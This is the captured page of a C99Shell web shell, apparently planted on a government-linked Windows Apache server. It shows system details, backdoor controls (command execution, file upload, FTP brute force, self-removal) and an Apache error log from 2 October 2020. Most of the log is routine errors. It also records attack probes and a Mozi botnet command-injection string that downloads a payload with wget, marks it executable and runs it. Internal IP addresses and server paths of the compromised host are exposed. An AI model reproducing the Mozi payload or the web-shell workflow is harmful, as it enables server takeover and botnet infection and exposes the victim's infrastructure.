!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 7.33 GB of 239.26 GB (3.07%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2020.10.02.log (27.31 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Fri Oct 02 00:37:11.100097 2020] [core:error] [pid 4480:tid 20476] [client 199.195.254.38:59334] AH00126: Invalid URI in request GET ../../proc/ HTTP
[Fri Oct 02 00:44:51.644106 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 00:48:19.452071 2020] [core:error] [pid 4480:tid 20660] (20024)The given path is misformatted or contained invalid characters: [client 198.240.70.92:7763] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file, referer: http://ambientebogota.gov.co/web/sda/inicio
[Fri Oct 02 00:48:40.246908 2020] [core:error] [pid 4480:tid 20184] (20024)The given path is misformatted or contained invalid characters: [client 198.240.70.92:15817] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file, referer: http://ambientebogota.gov.co/web/sda/inicio
[Fri Oct 02 00:55:19.732409 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 01:22:33.616879 2020] [proxy:error] [pid 4480:tid 20840] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Fri Oct 02 01:22:33.616879 2020] [proxy:error] [pid 4480:tid 20840] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Fri Oct 02 01:22:33.616879 2020] [proxy_http:error] [pid 4480:tid 20840] [client 152.61.192.232:34283] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Fri Oct 02 01:22:33.835280 2020] [proxy:error] [pid 4480:tid 20840] AH00940: HTTP: disabled connection for (172.22.1.51)
[Fri Oct 02 01:22:34.053680 2020] [proxy:error] [pid 4480:tid 20840] AH00940: HTTP: disabled connection for (172.22.1.51)
[Fri Oct 02 01:38:09.914924 2020] [proxy:error] [pid 4480:tid 20772] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Fri Oct 02 01:38:09.914924 2020] [proxy:error] [pid 4480:tid 20772] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Fri Oct 02 01:38:09.914924 2020] [proxy_http:error] [pid 4480:tid 20772] [client 152.61.128.50:49912] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Fri Oct 02 01:38:10.133324 2020] [proxy:error] [pid 4480:tid 20772] AH00940: HTTP: disabled connection for (172.22.1.51)
[Fri Oct 02 01:38:10.351725 2020] [proxy:error] [pid 4480:tid 20772] AH00940: HTTP: disabled connection for (172.22.1.51)
[Fri Oct 02 01:51:59.399581 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 02:30:42.633661 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 03:04:01.465172 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 04:14:53.595840 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 04:36:26.838112 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 05:06:54.272122 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 05:20:03.181107 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 05:22:39.430982 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 05:56:03.956502 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 06:15:53.442992 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 06:20:21.919463 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 06:34:35.490562 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 06:46:33.216623 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 06:50:01.289789 2020] [cgi:error] [pid 4480:tid 20880] [client 219.157.33.122:55705] script not found or unable to stat: E:/nuevo/htdocs/setup.cgi
[Fri Oct 02 08:07:38.381568 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 08:10:51.400707 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 08:20:43.452947 2020] [core:error] [pid 4480:tid 20348] (20024)The given path is misformatted or contained invalid characters: [client 173.211.35.156:21177] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file, referer: http://www.ambientebogota.gov.co/web/sda/inicio
[Fri Oct 02 08:20:51.003360 2020] [core:error] [pid 4480:tid 20348] (20024)The given path is misformatted or contained invalid characters: [client 173.211.35.156:21177] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file, referer: http://www.ambientebogota.gov.co/web/sda/inicio
[Fri Oct 02 08:22:28.441132 2020] [core:error] [pid 4480:tid 20492] (20024)The given path is misformatted or contained invalid characters: [client 198.240.69.188:13895] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file, referer: http://www.ambientebogota.gov.co/web/sda/inicio
[Fri Oct 02 08:28:02.609319 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 08:39:14.174898 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 08:42:56.319288 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 09:04:32.572365 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 09:46:13.693558 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 09:47:59.383744 2020] [proxy_http:error] [pid 4480:tid 20736] (70008)Partial results are valid but processing is incomplete: [client 190.249.27.27:50343] AH02609: read request body failed to 172.22.1.61:8080 (172.22.1.61) from 190.249.27.27 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Fri Oct 02 09:47:59.383744 2020] [proxy_http:error] [pid 4480:tid 20736] [client 190.249.27.27:50343] AH01097: pass request body failed to 172.22.1.61:8080 (172.22.1.61) from 190.249.27.27 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Fri Oct 02 10:06:57.093742 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 10:22:08.634543 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 10:25:54.382539 2020] [proxy_http:error] [pid 4480:tid 20324] (20014)Internal error: [client 190.249.27.27:50723] AH01102: error reading status line from remote server 172.22.1.61:8080, referer: http://190.27.245.106/sipse/faces/faces/autenticacion.xhtml
[Fri Oct 02 10:25:54.382539 2020] [proxy:error] [pid 4480:tid 20324] [client 190.249.27.27:50723] AH00898: Error reading from remote server returned by /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml, referer: http://190.27.245.106/sipse/faces/faces/autenticacion.xhtml
[Fri Oct 02 10:28:47.667644 2020] [core:error] [pid 4480:tid 20920] (20024)The given path is misformatted or contained invalid characters: [client 115.89.74.126:49764] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file, referer: http://www.ambientebogota.gov.co/
[Fri Oct 02 11:37:39.828982 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 11:38:53.227110 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 12:11:52.542987 2020] [core:error] [pid 4480:tid 20748] (20024)The given path is misformatted or contained invalid characters: [client 23.108.4.81:57482] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.0 to file, referer: http://dama.gov.co
[Fri Oct 02 12:11:53.666189 2020] [core:error] [pid 4480:tid 20268] (20024)The given path is misformatted or contained invalid characters: [client 209.58.151.131:49010] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.0 to file, referer: http://dama.gov.co
[Fri Oct 02 12:11:55.288592 2020] [core:error] [pid 4480:tid 20664] (20024)The given path is misformatted or contained invalid characters: [client 23.105.157.62:36792] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.0 to file, referer: http://dama.gov.co
[Fri Oct 02 12:11:56.318194 2020] [core:error] [pid 4480:tid 20248] (20024)The given path is misformatted or contained invalid characters: [client 23.108.254.123:38644] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.0 to file, referer: http://dama.gov.co
[Fri Oct 02 12:24:59.096368 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 12:35:03.940631 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 12:57:28.600593 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 13:11:22.500057 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 13:37:16.418787 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 14:39:12.111313 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 15:23:32.711586 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 15:43:44.162914 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 15:47:42.219332 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 16:20:35.154797 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 16:20:36.496399 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 16:52:45.829788 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 16:56:18.738962 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 17:04:54.288668 2020] [proxy_http:error] [pid 4480:tid 20620] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 186.102.3.0:42398] AH01095: prefetch request body failed to 172.22.1.61:8080 (172.22.1.61) from 186.102.3.0 (), referer: http://190.27.245.106/sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml
[Fri Oct 02 17:07:33.549347 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 17:07:34.688149 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 17:20:48.745144 2020] [core:error] [pid 4480:tid 20220] [client 42.235.155.152:49826] AH00126: Invalid URI in request 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
[Fri Oct 02 18:04:09.503712 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 18:15:23.144095 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 18:19:47.502160 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 18:34:54.487753 2020] [proxy_http:error] [pid 4480:tid 20496] (20014)Internal error: [client 190.249.27.27:53212] AH01102: error reading status line from remote server 172.22.1.61:8080, referer: http://190.27.245.106/sipse/faces/faces/autenticacion.xhtml
[Fri Oct 02 18:34:54.487753 2020] [proxy:error] [pid 4480:tid 20496] [client 190.249.27.27:53212] AH00898: Error reading from remote server returned by /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml, referer: http://190.27.245.106/sipse/faces/faces/autenticacion.xhtml
[Fri Oct 02 19:11:54.761652 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 19:24:58.366629 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 19:24:59.474231 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 19:33:13.542698 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 20:00:53.869215 2020] [cgi:error] [pid 4480:tid 20912] [client 116.149.247.177:45331] script not found or unable to stat: E:/nuevo/htdocs/setup.cgi
[Fri Oct 02 20:46:04.108775 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 20:46:21.424805 2020] [proxy_http:error] [pid 4480:tid 20124] (70008)Partial results are valid but processing is incomplete: [client 186.155.12.245:7751] AH01110: error reading response
[Fri Oct 02 20:47:39.409342 2020] [proxy_http:error] [pid 4480:tid 20160] (70008)Partial results are valid but processing is incomplete: [client 181.78.15.74:63420] AH01110: error reading response
[Fri Oct 02 20:51:46.342176 2020] [proxy_http:error] [pid 4480:tid 20124] (70008)Partial results are valid but processing is incomplete: [client 186.155.12.245:7789] AH01110: error reading response
[Fri Oct 02 20:53:58.770809 2020] [proxy_http:error] [pid 4480:tid 20160] (70008)Partial results are valid but processing is incomplete: [client 181.78.15.74:63422] AH01110: error reading response
[Fri Oct 02 20:56:04.195029 2020] [proxy_http:error] [pid 4480:tid 20344] (70008)Partial results are valid but processing is incomplete: [client 181.78.15.74:63423] AH01110: error reading response
[Fri Oct 02 20:57:14.488752 2020] [proxy_http:error] [pid 4480:tid 20124] (70008)Partial results are valid but processing is incomplete: [client 186.155.12.245:7762] AH01110: error reading response
[Fri Oct 02 21:02:12.558476 2020] [proxy_http:error] [pid 4480:tid 20160] (70008)Partial results are valid but processing is incomplete: [client 181.78.15.74:63436] AH01110: error reading response
[Fri Oct 02 21:03:22.602599 2020] [proxy_http:error] [pid 4480:tid 20124] (70008)Partial results are valid but processing is incomplete: [client 186.155.12.245:7789] AH01110: error reading response
[Fri Oct 02 21:07:24.730624 2020] [proxy_http:error] [pid 4480:tid 20160] (70008)Partial results are valid but processing is incomplete: [client 181.78.15.74:63462] AH01110: error reading response
[Fri Oct 02 21:09:29.218843 2020] [proxy_http:error] [pid 4480:tid 20124] (70008)Partial results are valid but processing is incomplete: [client 186.155.12.245:7796] AH01110: error reading response
[Fri Oct 02 21:14:39.347387 2020] [proxy_http:error] [pid 4480:tid 20160] (70008)Partial results are valid but processing is incomplete: [client 181.78.15.74:60957] AH01110: error reading response
[Fri Oct 02 21:17:03.975242 2020] [proxy_http:error] [pid 4480:tid 20124] (70008)Partial results are valid but processing is incomplete: [client 186.155.12.245:7799] AH01110: error reading response
[Fri Oct 02 22:18:40.230134 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:38:42.040645 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:38:53.569065 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:38:54.068266 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:38:54.567467 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:38:55.066667 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:38:56.564270 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:39:07.094289 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:39:09.106692 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:39:10.105094 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:39:10.604295 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:39:29.527128 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:39:29.542728 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:40:10.882801 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:40:27.668430 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:40:27.949231 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:41:51.034976 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:41:52.064578 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:44:16.006031 2020] [core:error] [pid 4480:tid 20544] (20025)The given path contained wildcard characters: [client 172.22.2.1:12066] AH00036: access to * failed (filesystem path 'E:/nuevo/htdocs/*')
[Fri Oct 02 22:44:40.045673 2020] [core:error] [pid 4480:tid 20912] [client 172.22.2.1:12161] AH00135: Invalid method in request IJYZWS / HTTP/1.1
[Fri Oct 02 22:44:53.212096 2020] [core:error] [pid 4480:tid 20304] [client 172.22.2.1:12240] AH00126: Invalid URI in request some invalid request
[Fri Oct 02 22:45:14.802534 2020] [core:error] [pid 4480:tid 20132] [client 172.22.2.1:12292] AH00126: Invalid URI in request GNUTELLA CONNECT/0.6
[Fri Oct 02 22:45:14.974135 2020] [core:error] [pid 4480:tid 20132] [client 172.22.2.1:12293] AH00126: Invalid URI in request GNUTELLA CONNECT/0.4
[Fri Oct 02 22:46:19.932649 2020] [core:error] [pid 4480:tid 20436] [client 172.22.2.1:12458] AH00126: Invalid URI in request t3 12.2.1
[Fri Oct 02 22:47:33.221577 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:47:40.678391 2020] [cgi:error] [pid 4480:tid 20436] [client 172.22.2.1:12746] script not found or unable to stat: E:/nuevo/htdocs/E5QnuUfWlrZd.cgi
[Fri Oct 02 22:47:55.545217 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:48:00.833626 2020] [cgi:error] [pid 4480:tid 20436] [client 172.22.2.1:12746] script not found or unable to stat: E:/nuevo/htdocs/E5QnuUfWlrZd.pl
[Fri Oct 02 22:48:25.091669 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:48:26.012070 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 22:48:32.938482 2020] [cgi:error] [pid 4480:tid 20436] [client 172.22.2.1:12746] script not found or unable to stat: E:/nuevo/htdocs/E5QnuUfWlrZd.asp
[Fri Oct 02 22:49:31.438585 2020] [cgi:error] [pid 4480:tid 20424] [client 172.22.2.1:13170] script not found or unable to stat: E:/nuevo/cgi-bin/E5QnuUfWlrZd.html
[Fri Oct 02 22:49:37.335395 2020] [cgi:error] [pid 4480:tid 20424] [client 172.22.2.1:13170] script not found or unable to stat: E:/nuevo/cgi-bin/E5QnuUfWlrZd.cgi
[Fri Oct 02 22:49:42.623805 2020] [cgi:error] [pid 4480:tid 20424] [client 172.22.2.1:13170] script not found or unable to stat: E:/nuevo/cgi-bin/E5QnuUfWlrZd.sh
[Fri Oct 02 22:49:48.926216 2020] [cgi:error] [pid 4480:tid 20424] [client 172.22.2.1:13170] script not found or unable to stat: E:/nuevo/cgi-bin/E5QnuUfWlrZd.pl
[Fri Oct 02 22:49:51.796621 2020] [cgi:error] [pid 4480:tid 20424] [client 172.22.2.1:13170] script not found or unable to stat: E:/nuevo/cgi-bin/E5QnuUfWlrZd.inc
[Fri Oct 02 22:49:56.211429 2020] [cgi:error] [pid 4480:tid 20424] [client 172.22.2.1:13170] script not found or unable to stat: E:/nuevo/cgi-bin/E5QnuUfWlrZd.shtml
[Fri Oct 02 22:50:01.531038 2020] [cgi:error] [pid 4480:tid 20424] [client 172.22.2.1:13170] script not found or unable to stat: E:/nuevo/cgi-bin/E5QnuUfWlrZd.asp
[Fri Oct 02 22:50:07.381048 2020] [cgi:error] [pid 4480:tid 20424] [client 172.22.2.1:13170] script not found or unable to stat: E:/nuevo/cgi-bin/E5QnuUfWlrZd.php
[Fri Oct 02 22:50:11.873856 2020] [cgi:error] [pid 4480:tid 20424] [client 172.22.2.1:13170] script not found or unable to stat: E:/nuevo/cgi-bin/E5QnuUfWlrZd.php3
[Fri Oct 02 22:50:17.879867 2020] [cgi:error] [pid 4480:tid 20424] [client 172.22.2.1:13170] script not found or unable to stat: E:/nuevo/cgi-bin/E5QnuUfWlrZd.cfm
[Fri Oct 02 22:52:12.196867 2020] [core:error] [pid 4480:tid 20116] [client 172.22.2.1:14528] AH00126: Invalid URI in request GET login?hsgid=00000000-0000-0000-0000-000000000000&hasFP=1 HTTP/1.1
[Fri Oct 02 22:53:03.505358 2020] [cgi:error] [pid 4480:tid 20244] [client 172.22.2.1:15013] script not found or unable to stat: E:/nuevo/htdocs/home.asp
[Fri Oct 02 22:53:21.460989 2020] [cgi:error] [pid 4480:tid 20416] [client 172.22.2.1:15425] script not found or unable to stat: E:/nuevo/cgi-bin/kvm.cgi
[Fri Oct 02 22:54:15.951885 2020] [core:error] [pid 4480:tid 20608] [client 172.22.2.1:15660] AH00126: Invalid URI in request GET /..\\pixfir~1\\how_to_login.html HTTP/1.1
[Fri Oct 02 22:58:40.699950 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 23:17:21.047118 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 23:47:57.763144 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Fri Oct 02 23:48:09.603564 2020] [mpm_winnt:warn] [pid 4480:tid 21444] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.1092 ]--